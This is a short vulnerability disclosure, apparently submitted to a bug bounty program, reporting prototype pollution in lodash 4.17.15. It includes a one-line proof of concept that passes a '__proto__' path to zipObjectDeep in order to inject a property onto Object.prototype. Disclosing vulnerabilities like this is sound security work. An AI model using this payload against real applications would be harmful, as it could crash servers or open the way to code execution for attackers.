Prototype pollution attack (lodash)

I would like to report a prototype pollution vulnerability in lodash. It allows an attacker to inject properties on Object.prototype Module module name: lodash version: 4.17.15 npm page: https://www.npmjs.com/package/lodash Module Description The Lodash library exported as Node.js modules. Module Stats 25,228,177 downloads in the last week Vulnerability Vulnerability Description This is a similar with this vulnerability: https://hackerone.com/reports/380873 The functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects. Steps To Reproduce: Craft an object by "zipObjectDeep" function of lodash const _ = require('lodash'); _.zipObjectDeep(['__proto__.z'],[123]) console.log(z) // 123 ## Impact Variable. Server crash or the server becoming unable to respond to all request is garanteed, but more significant impact like remote code execution can be achieved in some cases.